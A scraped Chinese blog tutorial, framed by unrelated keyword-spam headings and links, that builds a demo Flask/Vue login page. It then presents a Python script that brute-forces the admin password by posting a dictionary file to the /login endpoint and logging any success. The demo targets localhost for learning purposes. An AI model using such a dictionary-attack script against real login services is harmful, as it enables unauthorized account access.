当前位置: 首页 > news >正文

做幼儿网站的目标建设网站简单的需要多少天

做幼儿网站的目标,建设网站简单的需要多少天,资讯网站做app,重庆做网站好的公司项目简介 该项目的核心是实现简单网页端的密码破解#xff0c;主要是为了给没有基础的人#xff0c;提供一个思路#xff0c;了解这方面的攻防原理#xff0c;实际用途不大#xff0c;现在大部分有三代四代验证码#xff0c;还有一些加密算法等#xff0c;并不会像文章… 项目简介 该项目的核心是实现简单网页端的密码破解主要是为了给没有基础的人提供一个思路了解这方面的攻防原理实际用途不大现在大部分有三代四代验证码还有一些加密算法等并不会像文章中这么简单的实现直接跑字典而获取密码。 文章内的前后端是特意写的需要源码的话我到时候会把前后端放在文章底部。但这里源码的具体内容我不会进行讲解。 -------- 项目实施步骤 环境配置 运行前后端文件我的后端python版本为3.11.4 前端用的vue2axios --------- 项目演示 ------- 相关解释 先大致看下前后端的代码 后端 from flask import Flask, request, jsonify from flask_cors import CORS import pymysqlapp Flask(__name__) CORS(app)# 填写相应的数据库信息 ConSql pymysql.connect(host数据库地址,user账号,password密码,db数据库名称,charsetutf8mb4,cursorclasspymysql.cursors.DictCursor)app.route(/login, methods[POST]) def login():username request.json[username]password request.json[password]with ConSql.cursor() as cursor:sql SELECT * FROM login WHERE username %s AND password %scursor.execute(sql, (username, password))result cursor.fetchone()if result:return jsonify({status: success, message: 登录成功})else:return jsonify({status: error, message: 用户名或密码错误}) if __name__ __main__:app.run(debugTrue) 前端 !DOCTYPE html html langen headmeta charsetUTF-8meta nameviewport contentwidthdevice-width, initial-scale1.0title一夕千念_登录暴力破解demo/title!-- 这里使用vue2.0方便调用 --script srcvue.js/script!-- axios --script srchttps://cdn.jsdelivr.net/npm/axios/dist/axios.min.js/scriptstyle.bd{margin-top: 10%;width: 100%;height: 100%;background-color: #f5f5f5;display: flex;align-items: center;justify-content: center;}label {display: inline-block;width: 100px;margin-top: 5px;/* padding-left: 50px; *//* text-align: left; */}.login {/* margin-top: 150px; */text-align: center;}.login_bt {margin-top: 10px;} /style /head bodydiv idapp classbddiv classloginh2python实现密码暴力破解testPage/h2h4微信公众号关注“听说爱情很美”/h4div classuserlabel for用户名:/labelinput typetext v-modelusername/divdiv classpasswordlabel for密码:/labelinput typepassword v-modelpassword/div!-- 输出登录结果 --div classtets_status{{ test_status}}/divdiv classlogin_btbutton clickupdate登录/button/div/div/divscriptvar app new Vue ({el : #app,data:{username:,password:,test_status:},methods: {update(){axios.post(http://127.0.0.1:5000/login,{username:this.username,password:this.password}).then(res{// this.test_status res.data.statusif (res.data.status error) {this.test_status 登录失败请检查账号或密码是否正确;} else if (res.data.status success) {this.test_status 登录成功}// console.log(test_status);console.log(res.data)})}}}) /script /body /html 爆破脚本 import requests import jsonurl http://127.0.0.1:5000/login 单次测试 先判断单独写上传点能否上传成功 可以的话在写后面跑字典的操作 data {username:admin, password:123456} 开始跑字典查看是否可行。# 打开字典文件 with open(password.txt,r) as file:# 写一个新的数据提交先把密码为空后面将字典赋值给这里的密码datapwd {username:admin, password:}# 循环提交正式跑字典for pwd in file:datapwd[password] pwd.strip()req requests.post(url, jsondatapwd,headers{Content-Type:application/json})json_data json.loads(req.text)# 当返回的json的status的值为success时候单独输出在txt文件中if json_data[status] success:# print(password:datapwd[password]:\n,req.text)file open(success.txt,a)file.write(password:datapwd[password]:\nreq.text\n)file.close()# 输出返回结果print(password:datapwd[password]:\n,req.text) -------- 具体分析 这里用到两个工具 fiddler抓包软件 精易编程助手api调用重发软件 这里用到的软件都是可以找到其他替换品的只要能实现这两个功能就行了。 开始分析 打开fiddler与前端界面 点击开始抓包后随便输个密码 找到这关于相关数据包的数据因为我们本地用的就是这个5000端口所以直接看这个如果是实际环境中应该找相关域名或者公网地址 看到相关的返回值。 这里看到提交的密码信息 这样一个基本的提交包就找到了接下来进行重发包测试 这里将密码改成其他的值然后发送请求查看返回结果 OK这里基本就没问题了开始写脚本代码实现将txt中的密码大全一个一个提交获取返回结果。 先构造单次发送的代码 查看结果 OK接下来开始测试跑字典我这里随便在txt中写了几个密码中间已经包含正确的密码 运行脚本查看返回结果 发现可以找到成功的返回值 但是这里有个问题就是无法显示对应的密码是什么并且还要手动去找success这不对这肯定不符合我的预期继续改。 优化一下输出结果找到对应的password对应的结果并且把success的结果单独拿出来。 再次运行查看结果 密码为jiawen. 去前端测试查看 OK这样一个字典爆破密码的脚本就出来了。 其实还有很多方法可以实现我记得我很早之前就写过一种方法 【超简单】三步教会你暴力破解 可以参考一下。 微信公众号关注“听说爱情很美”后台回复“pj”可以获取源码
http://www.w-s-a.com/news/399024/

相关文章:

  • 有免费做网站的吗建设互联网站
  • 北京市保障房建设投资中心网站淄博哪个网站做房屋出赁好
  • 如何做网站的优化网站开发怎么收费
  • 网站的关键词怎么选择2345实用查询
  • 免费的制作网站做图剪片文案网站app接单
  • 中国有多少网站有多少域名上海网站建设网页制作邢台
  • 网站 数据报表如何做室内设计联盟官方网站入口
  • 怎样建设网站论文合肥做网站的软件公司
  • 收款后自动发货的网站是怎么做的怎么看网站后台网页尺寸
  • 谷歌seo引擎优化宁波seo关键词
  • 外贸网站建设需要注意什么seo课程
  • 做信息图网站网站建设的软件介绍
  • 网站开发语言数据库有几种魏县审批建设的网站
  • 北京公司网站建设推荐海口建设
  • 不懂编程如何做网站婚礼网站模板
  • 像京东一样的网站wordpress入门视频教程7 - 如何在文章里加入视频和音乐
  • 惠州网站建设排名wordpress3万篇文章优化
  • 创建网站的三种方法北京建王园林工程有限公司
  • jsp网站建设模板下载十大免费excel网站
  • 网络公司网站图片网站建立好了自己怎么做优化
  • 云主机是不是可以搭建无数个网站百度快速seo优化
  • 房地产怎么做网站推广建立音乐网站
  • 川畅科技联系 网站设计网站开发的教学视频
  • 为什么学网站开发凡科登陆
  • 设计师常备设计网站大全中山精品网站建设信息
  • 杭州建设工程网seo服务是什么
  • 兼职做问卷调查的网站wordpress mysql设置
  • 怎么在百度上能搜到自己的网站山西seo谷歌关键词优化工具
  • 网站搭建免费模板飞鱼crm下载
  • 网站开发竞品分析app制作公司深圳